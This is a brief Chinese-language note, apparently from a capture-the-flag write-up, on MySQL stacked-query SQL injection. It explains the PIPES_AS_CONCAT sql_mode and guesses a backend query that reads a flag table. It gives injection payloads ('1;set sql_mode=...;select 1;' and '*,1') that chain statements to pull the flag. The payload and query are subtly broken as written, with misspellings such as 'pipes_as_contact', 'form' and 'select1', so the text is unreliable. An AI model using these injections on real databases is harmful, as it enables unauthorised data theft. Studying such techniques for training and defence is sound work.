堆叠注入
利用原理:
补充系统变量@@sql_modesql_mode:是一组mysql支持的基本语法及校验规则
PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似
猜测后台sql语句为:
select 接受的变量 || flag form flag;
payload:
1;set sql_mode=pipes_as_contact;select1;
//闭合 //设置变量 //拼接sql语句
*,1
//拼接起来的sql语句是 select *,1 || flag from flag;